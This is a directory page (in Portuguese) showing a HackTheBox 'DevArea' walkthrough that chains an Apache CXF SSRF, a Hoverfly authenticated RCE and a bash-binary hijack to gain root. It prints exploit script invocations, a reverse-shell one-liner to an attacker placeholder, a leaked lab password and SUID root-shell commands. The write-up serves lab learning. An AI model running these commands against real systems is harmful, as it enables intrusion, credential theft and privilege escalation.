Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
devarea — Walkthrough do HackTheBox DevArea encadeando CVE-2022-46364 SSRF do Apache CXF, CVE-2025-54123 RCE do Hoverfly e hijacking de bash com SUID para escalação de root. | Kitploit
Ferramentas/GitHubGitHub/ledksv/devarea
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubledksv/devarea

devarea

Walkthrough do HackTheBox DevArea encadeando CVE-2022-46364 SSRF do Apache CXF, CVE-2025-54123 RCE do Hoverfly e hijacking de bash com SUID para escalação de root.

há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

DevArea — HackTheBox

Plataforma: HackTheBox SO: Linux Status: Retirado — walkthrough completo publicado.

Walkthrough completo: l3dsec.com/walkthroughs/devarea-htb


Cadeia de Ataque

root@kitploit:~
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
  → FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
    → CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
      → credenciais de admin em ExecStart
        → CVE-2025-54123 Hoverfly RCE → shell como dev_ryan → flag de usuário
          → /usr/bin/bash com permissão de escrita global + sudo syswatch.sh o chama
            → hijack do bash → rootbash SUID → flag de root

1. Enumeração

root@kitploit:~
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp  open  ftp     vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http    Jetty 9.4.27
# 8888/tcp open http    Hoverfly Dashboard

O download anônimo via FTP de pub/ fornece o employee-service.jar — serviço SOAP Apache CXF, versão empacotada anterior à 3.5.5.


2. CVE-2022-46364 (Apache CXF SSRF → leitura de credenciais)

CXF anterior à 3.5.5 reflete URLs XOP:Include href no lado do servidor — leitura arbitrária de arquivos via file://.

root@kitploit:~
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan

3. CVE-2025-54123 (RCE Autenticado no Hoverfly)

Hoverfly 1.11.3 — RCE autenticado via injeção de configuração de middleware.

root@kitploit:~
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Shell como dev_ryan. Flag de usuário em /home/dev_ryan/user.txt.


4. Escalação de Privilégios — Hijacking do Binário Bash

root@kitploit:~
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx  (world-writable)

syswatch.sh chama /usr/bin/bash internamente. Substitua por um script que cria SUID:

root@kitploit:~
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)

Flag de root em /root/root.txt.


Flags

FlagValor
Userredacted
Rootredacted

Apenas para fins educacionais. Teste somente sistemas que você possui ou tem permissão escrita explícita para testar.

Baixar ferramenta